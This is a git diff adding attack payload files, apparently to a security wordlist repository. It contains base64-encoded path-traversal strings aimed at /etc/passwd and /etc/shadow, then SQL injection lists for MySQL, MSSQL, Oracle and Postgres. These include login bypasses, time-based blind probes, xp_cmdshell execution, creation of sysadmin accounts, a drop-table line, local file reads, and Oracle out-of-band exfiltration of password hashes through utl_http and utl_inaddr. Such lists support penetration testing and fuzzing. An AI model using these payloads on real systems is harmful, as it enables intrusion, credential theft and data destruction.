+L2V0Yy9wYXNzd2QlMDA= +Li4vZXRjL3Bhc3N3ZA== +Li4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== +Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3NoYWRvdyUwMA== diff --git a/SQL injection/Payloads/FUZZDB_GenericBlind.txt b/SQL injection/Payloads/FUZZDB_GenericBlind.txt new file mode 100644 index 0000000..71d2174 --- /dev/null +++ b/SQL injection/Payloads/FUZZDB_GenericBlind.txt @@ -0,0 +1,42 @@ +# from wapiti +sleep(__TIME__)# +1 or sleep(__TIME__)# +" or sleep(__TIME__)# +' or sleep(__TIME__)# +" or sleep(__TIME__)=" +' or sleep(__TIME__)=' +1) or sleep(__TIME__)# +") or sleep(__TIME__)=" +') or sleep(__TIME__)=' +1)) or sleep(__TIME__)# +")) or sleep(__TIME__)=" +')) or sleep(__TIME__)=' +;waitfor delay '0:0:__TIME__'-- +);waitfor delay '0:0:__TIME__'-- +';waitfor delay '0:0:__TIME__'-- +";waitfor delay '0:0:__TIME__'-- +');waitfor delay '0:0:__TIME__'-- +");waitfor delay '0:0:__TIME__'-- +));waitfor delay '0:0:__TIME__'-- +'));waitfor delay '0:0:__TIME__'-- +"));waitfor delay '0:0:__TIME__'-- +benchmark(10000000,MD5(1))# +1 or benchmark(10000000,MD5(1))# +" or benchmark(10000000,MD5(1))# +' or benchmark(10000000,MD5(1))# +1) or benchmark(10000000,MD5(1))# +") or benchmark(10000000,MD5(1))# +') or benchmark(10000000,MD5(1))# +1)) or benchmark(10000000,MD5(1))# +")) or benchmark(10000000,MD5(1))# +')) or benchmark(10000000,MD5(1))# +pg_sleep(__TIME__)-- +1 or pg_sleep(__TIME__)-- +" or pg_sleep(__TIME__)-- +' or pg_sleep(__TIME__)-- +1) or pg_sleep(__TIME__)-- +") or pg_sleep(__TIME__)-- +') or pg_sleep(__TIME__)-- +1)) or pg_sleep(__TIME__)-- +")) or pg_sleep(__TIME__)-- +')) or pg_sleep(__TIME__)-- diff --git a/SQL injection/Payloads/FUZZDB_MSSQL.txt b/SQL injection/Payloads/FUZZDB_MSSQL.txt new file mode 100644 index 0000000..98bffba --- /dev/null +++ b/SQL injection/Payloads/FUZZDB_MSSQL.txt @@ -0,0 +1,17 @@ +# you will need to customize/modify some of the vaules in the queries for best effect +'; exec master..xp_cmdshell 'ping 10.10.1.2'-- +'create user name identified by 'pass123' -- +'create user name identified by pass123 temporary tablespace temp default tablespace users; +' ; drop table temp -- +'exec sp_addlogin 'name' , 'password' -- +' exec sp_addsrvrolemember 'name' , 'sysadmin' -- +' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) -- +' grant connect to name; grant resource to name; -- +' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64) +' or 1=1 -- +' union (select @@version) -- +' union (select NULL, (select @@version)) -- +' union (select NULL, NULL, (select @@version)) -- +' union (select NULL, NULL, NULL, (select @@version)) -- +' union (select NULL, NULL, NULL, NULL, (select @@version)) -- +' union (select NULL, NULL, NULL, NULL, NULL, (select @@version)) -- diff --git a/SQL injection/Payloads/FUZZDB_MSSQLEnumeration.txt b/SQL injection/Payloads/FUZZDB_MSSQLEnumeration.txt new file mode 100644 index 0000000..f9b53cf --- /dev/null +++ b/SQL injection/Payloads/FUZZDB_MSSQLEnumeration.txt @@ -0,0 +1,15 @@ +# ms-sqli info disclosure payload fuzzfile +# replace regex with your fuzzer for best results +# run wireshark or tcpdump, look for incoming smb or icmp packets from victim +# might need to terminate payloads with ;-- +select @@version +select @@servernamee +select @@microsoftversione +select * from master..sysserverse +select * from sysusers +exec master..xp_cmdshell 'ipconfig+/all' +exec master..xp_cmdshell 'net+view' +exec master..xp_cmdshell 'net+users' +exec master..xp_cmdshell 'ping+' +BACKUP database master to disks='\\\\backupdb.dat' +create table myfile (line varchar(8000))" bulk insert foo from 'c:\inetpub\wwwroot\auth.asp'" select * from myfile"-- diff --git a/SQL injection/Payloads/FUZZDB_MYSQL.txt b/SQL injection/Payloads/FUZZDB_MYSQL.txt new file mode 100644 index 0000000..9ada7a3 --- /dev/null +++ b/SQL injection/Payloads/FUZZDB_MYSQL.txt @@ -0,0 +1,6 @@ +1'1 +1 exec sp_ (or exec xp_) +1 and 1=1 +1' and 1=(select count(*) from tablenames); -- +1 or 1=1 +1' or '1'='1 diff --git a/SQL injection/Payloads/FUZZDB_MySQL_ReadLocalFiles.txt b/SQL injection/Payloads/FUZZDB_MySQL_ReadLocalFiles.txt new file mode 100644 index 0000000..aeb89ca --- /dev/null +++ b/SQL injection/Payloads/FUZZDB_MySQL_ReadLocalFiles.txt @@ -0,0 +1,3 @@ +# mysql local file disclosure through sqli +# fuzz interesting absolute filepath/filename into +create table myfile (input TEXT); load data infile '' into table myfile; select * from myfile; diff --git a/SQL injection/Payloads/FUZZDB_MySQL_SQLi_LoginBypass.txt b/SQL injection/Payloads/FUZZDB_MySQL_SQLi_LoginBypass.txt new file mode 100644 index 0000000..c4ba291 --- /dev/null +++ b/SQL injection/Payloads/FUZZDB_MySQL_SQLi_LoginBypass.txt @@ -0,0 +1,8 @@ +# regex replace as many as you can with your fuzzer for best results: +# +# also try to brute force a list of possible usernames, including possile admin acct names +' OR 1=1-- +'OR '' = ' Allows authentication without a valid username. +'-- +' union select 1, '', '' 1-- +'OR 1=1-- diff --git a/SQL injection/Payloads/FUZZDB_Oracle.txt b/SQL injection/Payloads/FUZZDB_Oracle.txt new file mode 100644 index 0000000..2b1e6ee --- /dev/null +++ b/SQL injection/Payloads/FUZZDB_Oracle.txt @@ -0,0 +1,56 @@ +# contains statements from jbrofuzz +’ or ‘1’=’1 +' or '1'='1 +'||utl_http.request('httP://192.168.1.1/')||' +' || myappadmin.adduser('admin', 'newpass') || ' +' AND 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE ROWNUM=1)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT SYS.LOGIN_USER FROM DUAL)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT SYS.DATABASE_NAME FROM DUAL)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT host_name FROM v$instance)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT global_name FROM global_name)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(table_name)) FROM sys.all_tables)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(column_name)) FROM sys.all_tab_columns)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE=SYS.LOGIN_USER)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=1)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=1)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=1)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=1)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=2)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=2)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=2)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=2)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=2)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=3)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=3)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=3)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=3)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=3)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=4)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=4)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=4)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=4)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=4)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=5)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=5)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=5)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=5)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=5)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=6)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=6)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=6)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=6)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=6)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=7)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=7)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=7)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=7)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=7)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=8)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=8)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=8)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=8)) AND 'i'='i +' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=8)) AND 'i'='i + diff --git a/SQL injection/Payloads/FUZZDB_PostgresEnumeration.txt b/SQL injection/Payloads/FUZZDB_PostgresEnumeration.txt new file mode 100644 index 0000000..d963527 --- /dev/null +++ b/SQL injection/Payloads/FUZZDB_PostgresEnumeration.txt @@ -0,0 +1,20 @@ +# info disclosure payload fuzzfile for pgsql +select version(); +select current_database(); +select current_user; +select session_user; +select current_setting('log_connections'); +select current_setting('log_statement'); +select current_setting('port'); +select current_setting('password_encryption'); +select current_setting('krb_server_keyfile'); +select current_setting('virtual_host'); +select current_setting('port'); +select current_setting('config_file'); +select current_setting('hba_file'); +select current_setting('data_directory'); +select * from pg_shadow; +select * from pg_group; +create table myfile (input TEXT); +copy myfile from '/etc/passwd'; +select * from myfile;copy myfile to /tmp/test; diff --git a/SQL injection/Payloads/Generic_SQLi b/SQL injection/Payloads/Generic_SQLi new file mode 100644 index 0000000..4a30a2e --- /dev/null +++ b/SQL injection/Payloads/Generic_SQLi @@ -0,0 +1,267 @@ +)%20or%20('x'='x +%20or%201=1 +; execute immediate 'sel' || 'ect us' || 'er' +benchmark(10000000,MD5(1))# +update +";waitfor delay '0:0:__TIME__'-- +1) or pg_sleep(__TIME__)-- +||(elt(-3+5,bin(15),ord(10),hex(char(45)))) +"hi"") or (""a""=""a" +delete +like +" or sleep(__TIME__)# +pg_sleep(__TIME__)-- +*(|(objectclass=*)) +declare @q nvarchar (200) 0x730065006c00650063 ... + or 0=0 # +insert +1) or sleep(__TIME__)# +) or ('a'='a +; exec xp_regread +*| +@var select @var as var into temp end -- +1)) or benchmark(10000000,MD5(1))# +asc +(||6) +"a"" or 3=3--" +" or benchmark(10000000,MD5(1))# +# from wapiti + or 0=0 -- +1 waitfor delay '0:0:10'-- + or 'a'='a +hi or 1=1 --" +or a = a + UNION ALL SELECT +) or sleep(__TIME__)=' +)) or benchmark(10000000,MD5(1))# +hi' or 'a'='a +0 +21 % +limit + or 1=1 + or 2 > 1 +")) or benchmark(10000000,MD5(1))# +PRINT +hi') or ('a'='a + or 3=3 +));waitfor delay '0:0:__TIME__'-- +a' waitfor delay '0:0:10'-- +1;(load_file(char(47,101,116,99,47,112,97,115, ... +or%201=1 +1 or sleep(__TIME__)# +or 1=1 + and 1 in (select var from temp)-- + or '7659'='7659 + or 'text' = n'text' + -- + or 1=1 or ''=' +declare @s varchar (200) select @s = 0x73656c6 ... +exec xp +; exec master..xp_cmdshell 'ping 172.10.1.255'-- +3.10E+17 +" or pg_sleep(__TIME__)-- +x' AND email IS NULL; -- +& +admin' or ' + or 'unusual' = 'unusual' +// +truncate +1) or benchmark(10000000,MD5(1))# +\x27UNION SELECT +declare @s varchar(200) select @s = 0x77616974 ... +tz_offset +sqlvuln +"));waitfor delay '0:0:__TIME__'-- +||6 +or%201=1 -- +%2A%28%7C%28objectclass%3D%2A%29%29 +or a=a +) union select * from information_schema.tables; +PRINT @@variable +or isNULL(1/0) /* +26 % +" or "a"="a +(sqlvuln) +x' AND members.email IS NULL; -- + or 1=1-- + and 1=( if((load_file(char(110,46,101,120,11 ... +0x770061006900740066006F0072002000640065006C00 ... +%20'sleep%2050' +as +1)) or pg_sleep(__TIME__)-- +/**/or/**/1/**/=/**/1 + union all select @@version-- +,@variable +(sqlattempt2) + or (EXISTS) +t'exec master..xp_cmdshell 'nslookup www.googl ... +%20$(sleep%2050) +1 or benchmark(10000000,MD5(1))# +%20or%20''=' +||UTL_HTTP.REQUEST + or pg_sleep(__TIME__)-- +hi' or 'x'='x'; +") or sleep(__TIME__)=" + or 'whatever' in ('whatever') +; begin declare @var varchar(8000) set @var=' ... + union select 1,load_file('/etc/passwd'),1,1,1; +0x77616974666F722064656C61792027303A303A313027 ... +exec(@s) +) or pg_sleep(__TIME__)-- + union select + or sleep(__TIME__)# + select * from information_schema.tables-- +a' or 1=1-- +a' or 'a' = 'a +declare @s varchar(22) select @s = + or 2 between 1 and 3 + or a=a-- + or '1'='1 +| + or sleep(__TIME__)=' + or 1 --' +or 0=0 #" +having +a' +" or isNULL(1/0) /* +declare @s varchar (8000) select @s = 0x73656c ... +‘ or 1=1 -- +char%4039%41%2b%40SELECT +order by +bfilename + having 1=1-- +) or benchmark(10000000,MD5(1))# + or username like char(37); +;waitfor delay '0:0:__TIME__'-- +" or 1=1-- +x' AND userid IS NULL; -- +*/* + or 'text' > 't' + (select top 1 + or benchmark(10000000,MD5(1))# +");waitfor delay '0:0:__TIME__'-- +a' or 3=3-- + -- &password= + group by userid having 1=1-- + or ''=' +; exec master..xp_cmdshell +%20or%20x=x +select +")) or sleep(__TIME__)=" +0x730065006c0065006300740020004000400076006500 ... +hi' or 1=1 -- +") or pg_sleep(__TIME__)-- +%20or%20'x'='x + or 'something' = 'some'+'thing' +exec sp +29 % +( +ý or 1=1 -- +1 or pg_sleep(__TIME__)-- +0 or 1=1 +) or (a=a +uni/**/on sel/**/ect +replace +%27%20or%201=1 +)) or pg_sleep(__TIME__)-- +%7C +x' AND 1=(SELECT COUNT(*) FROM tabname); -- +'%20OR +; or '1'='1' +declare @q nvarchar (200) select @q = 0x770061 ... +1 or 1=1 +; exec ('sel' + 'ect us' + 'er') +23 OR 1=1 +/ +anything' OR 'x'='x +declare @q nvarchar (4000) select @q = +or 0=0 -- +desc +||'6 +) +1)) or sleep(__TIME__)# +or 0=0 # + select name from syscolumns where id = (sele ... +hi or a=a +*(|(mail=*)) +password:*/=1-- +distinct +);waitfor delay '0:0:__TIME__'-- +to_timestamp_tz +") or benchmark(10000000,MD5(1))# + UNION SELECT +%2A%28%7C%28mail%3D%2A%29%29 ++sqlvuln + or 1=1 /* +)) or sleep(__TIME__)=' +or 1=1 or ""= + or 1 in (select @@version)-- +sqlvuln; + union select * from users where login = char ... +x' or 1=1 or 'x'='y +28 % +‘ or 3=3 -- +@variable + or '1'='1'-- +"a"" or 1=1--" +//* +%2A%7C +" or 0=0 -- +")) or pg_sleep(__TIME__)-- +? + or 1/* +! +' + or a = a +declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q) +declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s) +declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q) +declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s) +' or 1=1 + or 1=1 -- +x' OR full_name LIKE '%Bob% +'; exec master..xp_cmdshell 'ping 172.10.1.255'-- +'%20or%20''=' +'%20or%20'x'='x +')%20or%20('x'='x +' or 0=0 -- +' or 0=0 # + or 0=0 #" +' or 1=1-- +' or '1'='1'-- +' or 1 --' +or 1=1-- +' or 1=1 or ''=' + or 1=1 or ""= +' or a=a-- + or a=a +') or ('a'='a +'hi' or 'x'='x'; +or +procedure +handler +' or username like '% +' or uname like '% +' or userid like '% +' or uid like '% +' or user like '% +'; exec master..xp_cmdshell +'; exec xp_regread +t'exec master..xp_cmdshell 'nslookup www.google.com'-- +--sp_password +' UNION SELECT +' UNION ALL SELECT +' or (EXISTS) +' (select top 1 +'||UTL_HTTP.REQUEST +1;SELECT%20* +<>"'%;)(&+ +'%20or%201=1 +'sqlattempt1 +%28 +%29 +%26 +%21 +' or ''=' +' or 3=3 + or 3=3 -- diff --git a/SQL injection/Payloads/SQLi_Polyglots.txt b/SQL injection/Payloads/SQLi_Polyglots.txt new file mode 100644 index 0000000..4cc9d80 --- /dev/null +++ b/SQL injection/Payloads/SQLi_Polyglots.txt @@ -0,0 +1,2 @@ +SLEEP(1) /*‘ or SLEEP(1) or ‘“ or SLEEP(1) or “*/ +SELECT 1,2,IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),​SLEEP(1)))OR"*/ FROM some_table WHERE ex = ample diff --git a/Template injections/JHADDIX_SSI_Injection.txt b/Template injections/JHADDIX_SSI_Injection.txt new file mode 100644 index 0000000..9b7ba08 --- /dev/null +++ b/Template injections/JHADDIX_SSI_Injection.txt @@ -0,0 +1,75 @@ +
+
+
+
